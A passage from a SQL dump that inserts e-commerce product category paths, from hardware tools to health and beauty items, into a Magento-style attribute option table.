(2419, 2419, 0, 'Hardware > Tool Accessories > Sanding Accessories > Sandpaper & Sanding Sponges'),
(2420, 2420, 0, 'Hardware > Tool Accessories > Saw Accessories'),
(2421, 2421, 0, 'Hardware > Tool Accessories > Saw Accessories > Band Saw Accessories'),
(2422, 2422, 0, 'Hardware > Tool Accessories > Saw Accessories > Handheld Circular Saw Accessories'),
(2423, 2423, 0, 'Hardware > Tool Accessories > Saw Accessories > Jigsaw Accessories'),
(2424, 2424, 0, 'Hardware > Tool Accessories > Saw Accessories > Miter Saw Accessories'),
(2425, 2425, 0, 'Hardware > Tool Accessories > Saw Accessories > Table Saw Accessories'),
(2426, 2426, 0, 'Hardware > Tool Accessories > Shaper Accessories'),
(2427, 2427, 0, 'Hardware > Tool Accessories > Shaper Accessories > Shaper Cutters'),
(2428, 2428, 0, 'Hardware > Tool Accessories > Soldering Iron Accessories'),
(2429, 2429, 0, 'Hardware > Tool Accessories > Soldering Iron Accessories > Soldering Iron Stands'),
(2430, 2430, 0, 'Hardware > Tool Accessories > Soldering Iron Accessories > Soldering Iron Tips'),
(2431, 2431, 0, 'Hardware > Tool Accessories > Tool Blades'),
(2432, 2432, 0, 'Hardware > Tool Accessories > Tool Blades > Cutter & Scraper Blades'),
(2433, 2433, 0, 'Hardware > Tool Accessories > Tool Blades > Saw Blades'),
(2434, 2434, 0, 'Hardware > Tool Accessories > Tool Handle Wedges'),
(2435, 2435, 0, 'Hardware > Tool Accessories > Tool Safety Tethers'),
(2436, 2436, 0, 'Hardware > Tool Accessories > Tool Sockets'),
(2437, 2437, 0, 'Hardware > Tool Accessories > Tool Stands'),
(2438, 2438, 0, 'Hardware > Tool Accessories > Tool Stands > Saw Stands'),
(2439, 2439, 0, 'Hardware > Tool Accessories > Wedge Tools'),
(2440, 2440, 0, 'Hardware > Tool Accessories > Welding Accessories'),
(2441, 2441, 0, 'Hardware > Tools'),
(2442, 2442, 0, 'Hardware > Tools > Abrasive Blasters'),
(2443, 2443, 0, 'Hardware > Tools > Anvils'),
(2444, 2444, 0, 'Hardware > Tools > Axes'),
(2445, 2445, 0, 'Hardware > Tools > Carpentry Jointers'),
(2446, 2446, 0, 'Hardware > Tools > Carving Chisels & Gouges'),
(2447, 2447, 0, 'Hardware > Tools > Caulking Tools'),
(2448, 2448, 0, 'Hardware > Tools > Chimney Brushes'),
(2449, 2449, 0, 'Hardware > Tools > Compactors'),
(2450, 2450, 0, 'Hardware > Tools > Compressors'),
(2451, 2451, 0, 'Hardware > Tools > Concrete Brooms'),
(2452, 2452, 0, 'Hardware > Tools > Cutters'),
(2453, 2453, 0, 'Hardware > Tools > Cutters > Bolt Cutters'),
(2454, 2454, 0, 'Hardware > Tools > Cutters > Glass Cutters'),
(2455, 2455, 0, 'Hardware > Tools > Cutters > Handheld Metal Shears & Nibblers'),
(2456, 2456, 0, 'Hardware > Tools > Cutters > Nippers'),
(2457, 2457, 0, 'Hardware > Tools > Cutters > Pipe Cutters'),
(2458, 2458, 0, 'Hardware > Tools > Cutters > Rebar Cutters'),
(2459, 2459, 0, 'Hardware > Tools > Cutters > Tile & Shingle Cutters'),
(2460, 2460, 0, 'Hardware > Tools > Cutters > Utility Knives'),
(2461, 2461, 0, 'Hardware > Tools > Deburrers'),
(2462, 2462, 0, 'Hardware > Tools > Dollies & Hand Trucks'),
(2463, 2463, 0, 'Hardware > Tools > Drills'),
(2464, 2464, 0, 'Hardware > Tools > Drills > Augers'),
(2465, 2465, 0, 'Hardware > Tools > Drills > Drill Presses'),
(2466, 2466, 0, 'Hardware > Tools > Drills > Handheld Power Drills'),
(2467, 2467, 0, 'Hardware > Tools > Drills > Mortisers'),
(2468, 2468, 0, 'Hardware > Tools > Drills > Pneumatic Drills'),
(2469, 2469, 0, 'Hardware > Tools > Electrician Fish Tape'),
(2470, 2470, 0, 'Hardware > Tools > Flashlights & Headlamps'),
(2471, 2471, 0, 'Hardware > Tools > Grease Guns'),
(2472, 2472, 0, 'Hardware > Tools > Grinders'),
(2473, 2473, 0, 'Hardware > Tools > Grips'),
(2474, 2474, 0, 'Hardware > Tools > Hammers'),
(2475, 2475, 0, 'Hardware > Tools > Hammers > Manual Hammers'),
(2476, 2476, 0, 'Hardware > Tools > Hammers > Powered Hammers'),
(2477, 2477, 0, 'Hardware > Tools > Handheld Power Mixers'),
(2478, 2478, 0, 'Hardware > Tools > Hardware Torches'),
(2479, 2479, 0, 'Hardware > Tools > Heat Guns'),
(2480, 2480, 0, 'Hardware > Tools > Impact Wrenches & Drivers'),
(2481, 2481, 0, 'Hardware > Tools > Industrial Vibrators'),
(2482, 2482, 0, 'Hardware > Tools > Inspection Mirrors'),
(2483, 2483, 0, 'Hardware > Tools > Ladders & Scaffolding'),
(2484, 2484, 0, 'Hardware > Tools > Ladders & Scaffolding > Ladder Carts'),
(2485, 2485, 0, 'Hardware > Tools > Ladders & Scaffolding > Ladders'),
(2486, 2486, 0, 'Hardware > Tools > Ladders & Scaffolding > Scaffolding'),
(2487, 2487, 0, 'Hardware > Tools > Ladders & Scaffolding > Step Stools'),
(2488, 2488, 0, 'Hardware > Tools > Ladders & Scaffolding > Work Platforms'),
(2489, 2489, 0, 'Hardware > Tools > Lathes'),
(2490, 2490, 0, 'Hardware > Tools > Light Bulb Changers'),
(2491, 2491, 0, 'Hardware > Tools > Lighters & Matches'),
(2492, 2492, 0, 'Hardware > Tools > Log Splitters'),
(2493, 2493, 0, 'Hardware > Tools > Magnetic Sweepers'),
(2494, 2494, 0, 'Hardware > Tools > Marking Tools'),
(2495, 2495, 0, 'Hardware > Tools > Masonry Tools'),
(2496, 2496, 0, 'Hardware > Tools > Masonry Tools > Brick Tools'),
(2497, 2497, 0, 'Hardware > Tools > Masonry Tools > Cement Mixers'),
(2498, 2498, 0, 'Hardware > Tools > Masonry Tools > Construction Lines'),
(2499, 2499, 0, 'Hardware > Tools > Masonry Tools > Floats'),
(2500, 2500, 0, 'Hardware > Tools > Masonry Tools > Grout Sponges'),
(2501, 2501, 0, 'Hardware > Tools > Masonry Tools > Masonry Edgers & Groovers'),
(2502, 2502, 0, 'Hardware > Tools > Masonry Tools > Masonry Jointers'),
(2503, 2503, 0, 'Hardware > Tools > Masonry Tools > Masonry Trowels'),
(2504, 2504, 0, 'Hardware > Tools > Masonry Tools > Power Trowels'),
(2505, 2505, 0, 'Hardware > Tools > Mattocks & Pickaxes'),
(2506, 2506, 0, 'Hardware > Tools > Measuring Tools & Sensors'),
(2507, 2507, 0, 'Hardware > Tools > Measuring Tools & Sensors > Air Quality Meters'),
(2508, 2508, 0, 'Hardware > Tools > Measuring Tools & Sensors > Altimeters'),
(2509, 2509, 0, 'Hardware > Tools > Measuring Tools & Sensors > Anemometers'),
(2510, 2510, 0, 'Hardware > Tools > Measuring Tools & Sensors > Barometers'),
(2511, 2511, 0, 'Hardware > Tools > Measuring Tools & Sensors > Calipers'),
(2512, 2512, 0, 'Hardware > Tools > Measuring Tools & Sensors > Cruising Rods'),
(2513, 2513, 0, 'Hardware > Tools > Measuring Tools & Sensors > Distance Meters'),
(2514, 2514, 0, 'Hardware > Tools > Measuring Tools & Sensors > Dividers'),
(2515, 2515, 0, 'Hardware > Tools > Measuring Tools & Sensors > Electrical Testing Tools'),
(2516, 2516, 0, 'Hardware > Tools > Measuring Tools & Sensors > Flow Meters & Controllers'),
(2517, 2517, 0, 'Hardware > Tools > Measuring Tools & Sensors > Gas Detectors'),
(2518, 2518, 0, 'Hardware > Tools > Measuring Tools & Sensors > Gauges'),
(2519, 2519, 0, 'Hardware > Tools > Measuring Tools & Sensors > Geiger Counters'),
(2520, 2520, 0, 'Hardware > Tools > Measuring Tools & Sensors > Hygrometers'),
(2521, 2521, 0, 'Hardware > Tools > Measuring Tools & Sensors > Infrared Thermometers'),
(2522, 2522, 0, 'Hardware > Tools > Measuring Tools & Sensors > Knife Guides'),
(2523, 2523, 0, 'Hardware > Tools > Measuring Tools & Sensors > Levels'),
(2524, 2524, 0, 'Hardware > Tools > Measuring Tools & Sensors > Levels > Bubble Levels'),
(2525, 2525, 0, 'Hardware > Tools > Measuring Tools & Sensors > Levels > Laser Levels'),
(2526, 2526, 0, 'Hardware > Tools > Measuring Tools & Sensors > Levels > Sight Levels'),
(2527, 2527, 0, 'Hardware > Tools > Measuring Tools & Sensors > Measuring Scales'),
(2528, 2528, 0, 'Hardware > Tools > Measuring Tools & Sensors > Measuring Wheels'),
(2529, 2529, 0, 'Hardware > Tools > Measuring Tools & Sensors > Moisture Meters'),
(2530, 2530, 0, 'Hardware > Tools > Measuring Tools & Sensors > Probes & Finders'),
(2531, 2531, 0, 'Hardware > Tools > Measuring Tools & Sensors > Protractors'),
(2532, 2532, 0, 'Hardware > Tools > Measuring Tools & Sensors > Rebar Locators'),
(2533, 2533, 0, 'Hardware > Tools > Measuring Tools & Sensors > Rulers'),
(2534, 2534, 0, 'Hardware > Tools > Measuring Tools & Sensors > Seismometer'),
(2535, 2535, 0, 'Hardware > Tools > Measuring Tools & Sensors > Sound Meters'),
(2536, 2536, 0, 'Hardware > Tools > Measuring Tools & Sensors > Squares'),
(2537, 2537, 0, 'Hardware > Tools > Measuring Tools & Sensors > Straight Edges'),
(2538, 2538, 0, 'Hardware > Tools > Measuring Tools & Sensors > Stud Sensors'),
(2539, 2539, 0, 'Hardware > Tools > Measuring Tools & Sensors > Tape Measures'),
(2540, 2540, 0, 'Hardware > Tools > Measuring Tools & Sensors > Theodolites'),
(2541, 2541, 0, 'Hardware > Tools > Measuring Tools & Sensors > Thermal Imaging Cameras'),
(2542, 2542, 0, 'Hardware > Tools > Measuring Tools & Sensors > Thermocouples & Thermopiles'),
(2543, 2543, 0, 'Hardware > Tools > Measuring Tools & Sensors > Transducers'),
(2544, 2544, 0, 'Hardware > Tools > Measuring Tools & Sensors > UV Light Meters'),
(2545, 2545, 0, 'Hardware > Tools > Measuring Tools & Sensors > Vibration Meters'),
(2546, 2546, 0, 'Hardware > Tools > Measuring Tools & Sensors > Weather Forecasters & Stations'),
(2547, 2547, 0, 'Hardware > Tools > Measuring Tools & Sensors > pH Meters'),
(2548, 2548, 0, 'Hardware > Tools > Milling Machines'),
(2549, 2549, 0, 'Hardware > Tools > Multifunction Power Tools'),
(2550, 2550, 0, 'Hardware > Tools > Nail Pullers'),
(2551, 2551, 0, 'Hardware > Tools > Nailers & Staplers'),
(2552, 2552, 0, 'Hardware > Tools > Oil Filter Drains'),
(2553, 2553, 0, 'Hardware > Tools > Paint Tools'),
(2554, 2554, 0, 'Hardware > Tools > Paint Tools > Airbrushes'),
(2555, 2555, 0, 'Hardware > Tools > Paint Tools > Paint Brushes'),
(2556, 2556, 0, 'Hardware > Tools > Paint Tools > Paint Edgers'),
(2557, 2557, 0, 'Hardware > Tools > Paint Tools > Paint Rollers'),
(2558, 2558, 0, 'Hardware > Tools > Paint Tools > Paint Shakers'),
(2559, 2559, 0, 'Hardware > Tools > Paint Tools > Paint Sponges'),
(2560, 2560, 0, 'Hardware > Tools > Paint Tools > Paint Sprayers');
INSERT INTO `eav_attribute_option_value` (`value_id`, `option_id`, `store_id`, `value`) VALUES
(2561, 2561, 0, 'Hardware > Tools > Paint Tools > Paint Strainers'),
(2562, 2562, 0, 'Hardware > Tools > Paint Tools > Paint Trays'),
(2563, 2563, 0, 'Hardware > Tools > Pickup Tools'),
(2564, 2564, 0, 'Hardware > Tools > Pipe & Bar Benders'),
(2565, 2565, 0, 'Hardware > Tools > Pipe & Tube Cleaners'),
(2566, 2566, 0, 'Hardware > Tools > Pipe Brushes'),
(2567, 2567, 0, 'Hardware > Tools > Planers'),
(2568, 2568, 0, 'Hardware > Tools > Planes'),
(2569, 2569, 0, 'Hardware > Tools > Pliers'),
(2570, 2570, 0, 'Hardware > Tools > Plungers'),
(2571, 2571, 0, 'Hardware > Tools > Polishers & Buffers'),
(2572, 2572, 0, 'Hardware > Tools > Post Hole Diggers'),
(2573, 2573, 0, 'Hardware > Tools > Pry Bars'),
(2574, 2574, 0, 'Hardware > Tools > Punches & Awls'),
(2575, 2575, 0, 'Hardware > Tools > Putty Knives & Scrapers'),
(2576, 2576, 0, 'Hardware > Tools > Reamers'),
(2577, 2577, 0, 'Hardware > Tools > Riveting Tools'),
(2578, 2578, 0, 'Hardware > Tools > Riveting Tools > Rivet Guns'),
(2579, 2579, 0, 'Hardware > Tools > Riveting Tools > Rivet Pliers'),
(2580, 2580, 0, 'Hardware > Tools > Routing Tools'),
(2581, 2581, 0, 'Hardware > Tools > Sanders'),
(2582, 2582, 0, 'Hardware > Tools > Sanding Blocks'),
(2583, 2583, 0, 'Hardware > Tools > Saw Horses'),
(2584, 2584, 0, 'Hardware > Tools > Saws'),
(2585, 2585, 0, 'Hardware > Tools > Saws > Band Saws'),
(2586, 2586, 0, 'Hardware > Tools > Saws > Cut-Off Saws'),
(2587, 2587, 0, 'Hardware > Tools > Saws > Hand Saws'),
(2588, 2588, 0, 'Hardware > Tools > Saws > Handheld Circular Saws'),
(2589, 2589, 0, 'Hardware > Tools > Saws > Jigsaws'),
(2590, 2590, 0, 'Hardware > Tools > Saws > Masonry & Tile Saws'),
(2591, 2591, 0, 'Hardware > Tools > Saws > Miter Saws'),
(2592, 2592, 0, 'Hardware > Tools > Saws > Panel Saws'),
(2593, 2593, 0, 'Hardware > Tools > Saws > Reciprocating Saws'),
(2594, 2594, 0, 'Hardware > Tools > Saws > Scroll Saws'),
(2595, 2595, 0, 'Hardware > Tools > Saws > Table Saws'),
(2596, 2596, 0, 'Hardware > Tools > Screwdrivers'),
(2597, 2597, 0, 'Hardware > Tools > Shapers'),
(2598, 2598, 0, 'Hardware > Tools > Sharpeners'),
(2599, 2599, 0, 'Hardware > Tools > Socket Drivers'),
(2600, 2600, 0, 'Hardware > Tools > Soldering Irons'),
(2601, 2601, 0, 'Hardware > Tools > Tap Reseaters'),
(2602, 2602, 0, 'Hardware > Tools > Taps & Dies'),
(2603, 2603, 0, 'Hardware > Tools > Threading Machines'),
(2604, 2604, 0, 'Hardware > Tools > Tool Clamps & Vises'),
(2605, 2605, 0, 'Hardware > Tools > Tool Files'),
(2606, 2606, 0, 'Hardware > Tools > Tool Keys'),
(2607, 2607, 0, 'Hardware > Tools > Tool Knives'),
(2608, 2608, 0, 'Hardware > Tools > Tool Sets'),
(2609, 2609, 0, 'Hardware > Tools > Tool Sets > Hand Tool Sets'),
(2610, 2610, 0, 'Hardware > Tools > Tool Sets > Power Tool Combo Sets'),
(2611, 2611, 0, 'Hardware > Tools > Welding Guns & Plasma Cutters'),
(2612, 2612, 0, 'Hardware > Tools > Wire & Cable Hand Tools'),
(2613, 2613, 0, 'Hardware > Tools > Work Lights'),
(2614, 2614, 0, 'Hardware > Tools > Wrenches'),
(2615, 2615, 0, 'Health & Beauty'),
(2616, 2616, 0, 'Health & Beauty > Health Care'),
(2617, 2617, 0, 'Health & Beauty > Health Care > Acupuncture'),
(2618, 2618, 0, 'Health & Beauty > Health Care > Acupuncture > Acupuncture Models'),
(2619, 2619, 0, 'Health & Beauty > Health Care > Acupuncture > Acupuncture Needles'),
(2620, 2620, 0, 'Health & Beauty > Health Care > Bed Pans'),
(2621, 2621, 0, 'Health & Beauty > Health Care > Biometric Monitor Accessories'),
(2622, 2622, 0, 'Health & Beauty > Health Care > Biometric Monitor Accessories > Activity Monitor Accessories'),
(2623, 2623, 0, 'Health & Beauty > Health Care > Biometric Monitor Accessories > Blood Glucose Meter Accessories'),
(2624, 2624, 0, 'Health & Beauty > Health Care > Biometric Monitor Accessories > Blood Glucose Meter Accessories > Blood Glucose Control Solution'),
(2625, 2625, 0, 'Health & Beauty > Health Care > Biometric Monitor Accessories > Blood Glucose Meter Accessories > Blood Glucose Test Strips'),
(2626, 2626, 0, 'Health & Beauty > Health Care > Biometric Monitor Accessories > Blood Glucose Meter Accessories > Lancing Devices'),
(2627, 2627, 0, 'Health & Beauty > Health Care > Biometric Monitor Accessories > Blood Pressure Monitor Accessories'),
(2628, 2628, 0, 'Health & Beauty > Health Care > Biometric Monitor Accessories > Blood Pressure Monitor Accessories > Blood Pressure Monitor Cuffs'),
(2629, 2629, 0, 'Health & Beauty > Health Care > Biometric Monitor Accessories > Body Weight Scale Accessories'),
(2630, 2630, 0, 'Health & Beauty > Health Care > Biometric Monitors'),
(2631, 2631, 0, 'Health & Beauty > Health Care > Biometric Monitors > Activity Monitors'),
(2632, 2632, 0, 'Health & Beauty > Health Care > Biometric Monitors > Blood Glucose Meters'),
(2633, 2633, 0, 'Health & Beauty > Health Care > Biometric Monitors > Blood Pressure Monitors'),
(2634, 2634, 0, 'Health & Beauty > Health Care > Biometric Monitors > Body Fat Analyzers'),
(2635, 2635, 0, 'Health & Beauty > Health Care > Biometric Monitors > Body Weight Scales'),
(2636, 2636, 0, 'Health & Beauty > Health Care > Biometric Monitors > Breathalyzers'),
(2637, 2637, 0, 'Health & Beauty > Health Care > Biometric Monitors > Cholesterol Analyzers'),
(2638, 2638, 0, 'Health & Beauty > Health Care > Biometric Monitors > Fertility Monitors and Ovulation Tests'),
(2639, 2639, 0, 'Health & Beauty > Health Care > Biometric Monitors > Medical Thermometers'),
(2640, 2640, 0, 'Health & Beauty > Health Care > Biometric Monitors > Prenatal Heart Rate Monitors'),
(2641, 2641, 0, 'Health & Beauty > Health Care > Biometric Monitors > Pulse Oximeters'),
(2642, 2642, 0, 'Health & Beauty > Health Care > Condoms'),
(2643, 2643, 0, 'Health & Beauty > Health Care > Conductivity Gels & Lotions'),
(2644, 2644, 0, 'Health & Beauty > Health Care > Contraceptive Cases'),
(2645, 2645, 0, 'Health & Beauty > Health Care > First Aid'),
(2646, 2646, 0, 'Health & Beauty > Health Care > First Aid > Antiseptics & Cleaning Supplies'),
(2647, 2647, 0, 'Health & Beauty > Health Care > First Aid > Cast & Bandage Protectors'),
(2648, 2648, 0, 'Health & Beauty > Health Care > First Aid > Eye Wash Supplies'),
(2649, 2649, 0, 'Health & Beauty > Health Care > First Aid > First Aid Kits'),
(2650, 2650, 0, 'Health & Beauty > Health Care > First Aid > Hot & Cold Therapies'),
(2651, 2651, 0, 'Health & Beauty > Health Care > First Aid > Hot & Cold Therapies > Heat Rubs'),
(2652, 2652, 0, 'Health & Beauty > Health Care > First Aid > Hot & Cold Therapies > Heating Pads'),
(2653, 2653, 0, 'Health & Beauty > Health Care > First Aid > Hot & Cold Therapies > Ice Packs'),
(2654, 2654, 0, 'Health & Beauty > Health Care > First Aid > Medical Tape & Bandages'),
(2655, 2655, 0, 'Health & Beauty > Health Care > Fitness & Nutrition'),
(2656, 2656, 0, 'Health & Beauty > Health Care > Fitness & Nutrition > Nutrition Bars'),
(2657, 2657, 0, 'Health & Beauty > Health Care > Fitness & Nutrition > Nutrition Drinks & Shakes'),
(2658, 2658, 0, 'Health & Beauty > Health Care > Fitness & Nutrition > Nutrition Gels & Chews'),
(2659, 2659, 0, 'Health & Beauty > Health Care > Fitness & Nutrition > Nutritional Food PurÃ©es'),
(2660, 2660, 0, 'Health & Beauty > Health Care > Fitness & Nutrition > Tube Feeding Supplements'),
(2661, 2661, 0, 'Health & Beauty > Health Care > Fitness & Nutrition > Vitamins & Supplements'),
(2662, 2662, 0, 'Health & Beauty > Health Care > Hearing Aids'),
(2663, 2663, 0, 'Health & Beauty > Health Care > Incontinence Aids'),
(2664, 2664, 0, 'Health & Beauty > Health Care > Light Therapy Lamps'),
(2665, 2665, 0, 'Health & Beauty > Health Care > Medical Alarm Systems'),
(2666, 2666, 0, 'Health & Beauty > Health Care > Medical Identification Tags & Jewelry'),
(2667, 2667, 0, 'Health & Beauty > Health Care > Medical Tests'),
(2668, 2668, 0, 'Health & Beauty > Health Care > Medical Tests > Allergy Test Kits'),
(2669, 2669, 0, 'Health & Beauty > Health Care > Medical Tests > Blood Typing Test Kits'),
(2670, 2670, 0, 'Health & Beauty > Health Care > Medical Tests > Drug Tests'),
(2671, 2671, 0, 'Health & Beauty > Health Care > Medical Tests > HIV Tests'),
(2672, 2672, 0, 'Health & Beauty > Health Care > Medical Tests > Pregnancy Tests'),
(2673, 2673, 0, 'Health & Beauty > Health Care > Medical Tests > Urinary Tract Infection Tests'),
(2674, 2674, 0, 'Health & Beauty > Health Care > Medicine & Drugs'),
(2675, 2675, 0, 'Health & Beauty > Health Care > Mobility & Accessibility'),
(2676, 2676, 0, 'Health & Beauty > Health Care > Mobility & Accessibility > Accessibility Equipment'),
(2677, 2677, 0, 'Health & Beauty > Health Care > Mobility & Accessibility > Accessibility Equipment > Mobility Scooters'),
(2678, 2678, 0, 'Health & Beauty > Health Care > Mobility & Accessibility > Accessibility Equipment > Stair Lifts'),
(2679, 2679, 0, 'Health & Beauty > Health Care > Mobility & Accessibility > Accessibility Equipment > Transfer Boards & Sheets'),
(2680, 2680, 0, 'Health & Beauty > Health Care > Mobility & Accessibility > Accessibility Equipment > Wheelchairs'),
(2681, 2681, 0, 'Health & Beauty > Health Care > Mobility & Accessibility > Accessibility Equipment Accessories'),
(2682, 2682, 0, 'Health & Beauty > Health Care > Mobility & Accessibility > Accessibility Furniture & Fixtures'),
(2683, 2683, 0, 'Health & Beauty > Health Care > Mobility & Accessibility > Accessibility Furniture & Fixtures > Shower Benches & Seats'),
(2684, 2684, 0, 'Health & Beauty > Health Care > Mobility & Accessibility > Walking Aid Accessories'),
(2685, 2685, 0, 'Health & Beauty > Health Care > Mobility & Accessibility > Walking Aids'),
(2686, 2686, 0, 'Health & Beauty > Health Care > Mobility & Accessibility > Walking Aids > Canes & Walking Sticks'),
(2687, 2687, 0, 'Health & Beauty > Health Care > Mobility & Accessibility > Walking Aids > Crutches'),
(2688, 2688, 0, 'Health & Beauty > Health Care > Mobility & Accessibility > Walking Aids > Walkers'),
(2689, 2689, 0, 'Health & Beauty > Health Care > Occupational & Physical Therapy Equipment'),
(2690, 2690, 0, 'Health & Beauty > Health Care > Occupational & Physical Therapy Equipment > Electrical Muscle Stimulators'),
(2691, 2691, 0, 'Health & Beauty > Health Care > Occupational & Physical Therapy Equipment > Therapeutic Swings'),
(2692, 2692, 0, 'Health & Beauty > Health Care > Pillboxes'),
(2693, 2693, 0, 'Health & Beauty > Health Care > Respiratory Care'),
(2694, 2694, 0, 'Health & Beauty > Health Care > Respiratory Care > Nebulizers'),
(2695, 2695, 0, 'Health & Beauty > Health Care > Respiratory Care > Oxygen Tanks'),
(2696, 2696, 0, 'Health & Beauty > Health Care > Respiratory Care > PAP Machines'),
(2697, 2697, 0, 'Health & Beauty > Health Care > Respiratory Care > PAP Masks'),
(2698, 2698, 0, 'Health & Beauty > Health Care > Respiratory Care > Steam Inhalers'),
(2699, 2699, 0, 'Health & Beauty > Health Care > Specimen Cups'),
(2700, 2700, 0, 'Health & Beauty > Health Care > Spermicides'),
(2701, 2701, 0, 'Health & Beauty > Health Care > Stump Shrinkers'),
(2702, 2702, 0, 'Health & Beauty > Health Care > Supports & Braces'),
(2703, 2703, 0, 'Health & Beauty > Health Care > Surgical Lubricants'),
(2704, 2704, 0, 'Health & Beauty > Jewelry Cleaning & Care'),
(2705, 2705, 0, 'Health & Beauty > Jewelry Cleaning & Care > Jewelry Cleaning Solutions & Polishes'),
(2706, 2706, 0, 'Health & Beauty > Jewelry Cleaning & Care > Jewelry Cleaning Tools'),
(2707, 2707, 0, 'Health & Beauty > Jewelry Cleaning & Care > Jewelry Holders'),
(2708, 2708, 0, 'Health & Beauty > Jewelry Cleaning & Care > Jewelry Steam Cleaners'),
(2709, 2709, 0, 'Health & Beauty > Jewelry Cleaning & Care > Watch Repair Kits'),
(2710, 2710, 0, 'Health & Beauty > Personal Care'),
(2711, 2711, 0, 'Health & Beauty > Personal Care > Back Care'),
(2712, 2712, 0, 'Health & Beauty > Personal Care > Back Care > Back & Lumbar Support Cushions'),
(2713, 2713, 0, 'Health & Beauty > Personal Care > Cosmetics'),
(2714, 2714, 0, 'Health & Beauty > Personal Care > Cosmetics > Bath & Body'),
(2715, 2715, 0, 'Health & Beauty > Personal Care > Cosmetics > Bath & Body > Adult Hygienic Wipes'),
(2716, 2716, 0, 'Health & Beauty > Personal Care > Cosmetics > Bath & Body > Bar Soap'),
(2717, 2717, 0, 'Health & Beauty > Personal Care > Cosmetics > Bath & Body > Bath Additives'),
(2718, 2718, 0, 'Health & Beauty > Personal Care > Cosmetics > Bath & Body > Bath Brushes'),
(2719, 2719, 0, 'Health & Beauty > Personal Care > Cosmetics > Bath & Body > Bath Sponges & Loofahs'),
(2720, 2720, 0, 'Health & Beauty > Personal Care > Cosmetics > Bath & Body > Body Wash'),
(2721, 2721, 0, 'Health & Beauty > Personal Care > Cosmetics > Bath & Body > Hand Sanitizers & Wipes'),
(2722, 2722, 0, 'Health & Beauty > Personal Care > Cosmetics > Bath & Body > Liquid Hand Soap'),
(2723, 2723, 0, 'Health & Beauty > Personal Care > Cosmetics > Bath & Body > Powdered Hand Soap'),
(2724, 2724, 0, 'Health & Beauty > Personal Care > Cosmetics > Bath & Body > Shower Caps'),
(2725, 2725, 0, 'Health & Beauty > Personal Care > Cosmetics > Bath & Body Gift Sets'),
(2726, 2726, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Sets'),
(2727, 2727, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tool Cleansers'),
(2728, 2728, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools'),
(2729, 2729, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Makeup Tools'),
(2730, 2730, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Makeup Tools > Double Eyelid Glue & Tape'),
(2731, 2731, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Makeup Tools > Eyebrow Stencils'),
(2732, 2732, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Makeup Tools > Eyelash Curler Refills'),
(2733, 2733, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Makeup Tools > Eyelash Curlers'),
(2734, 2734, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Makeup Tools > Face Mirrors'),
(2735, 2735, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Makeup Tools > Facial Blotting Paper'),
(2736, 2736, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Makeup Tools > False Eyelash Accessories'),
(2737, 2737, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Makeup Tools > False Eyelash Accessories > False Eyelash Adhesive'),
(2738, 2738, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Makeup Tools > False Eyelash Accessories > False Eyelash Applicators'),
(2739, 2739, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Makeup Tools > False Eyelash Accessories > False Eyelash Remover'),
(2740, 2740, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Makeup Tools > Makeup Brushes'),
(2741, 2741, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Makeup Tools > Makeup Sponges'),
(2742, 2742, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Makeup Tools > Refillable Makeup Palettes & Cases'),
(2743, 2743, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Nail Tools'),
(2744, 2744, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Nail Tools > Cuticle Pushers'),
(2745, 2745, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Nail Tools > Cuticle Scissors'),
(2746, 2746, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Nail Tools > Manicure & Pedicure Spacers'),
(2747, 2747, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Nail Tools > Manicure Tool Sets'),
(2748, 2748, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Nail Tools > Nail Buffers'),
(2749, 2749, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Nail Tools > Nail Clippers'),
(2750, 2750, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Nail Tools > Nail Drill Accessories'),
(2751, 2751, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Nail Tools > Nail Drills'),
(2752, 2752, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Nail Tools > Nail Dryers'),
(2753, 2753, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Nail Tools > Nail Files & Emery Boards'),
(2754, 2754, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Skin Care Tools'),
(2755, 2755, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Skin Care Tools > Facial Saunas'),
(2756, 2756, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Skin Care Tools > Foot Files'),
(2757, 2757, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Skin Care Tools > Lotion & Sunscreen Applicators'),
(2758, 2758, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Skin Care Tools > Pumice Stones'),
(2759, 2759, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Skin Care Tools > Skin Care Extractors'),
(2760, 2760, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Skin Care Tools > Skin Care Rollers'),
(2761, 2761, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Skin Care Tools > Skin Cleansing Brush Heads'),
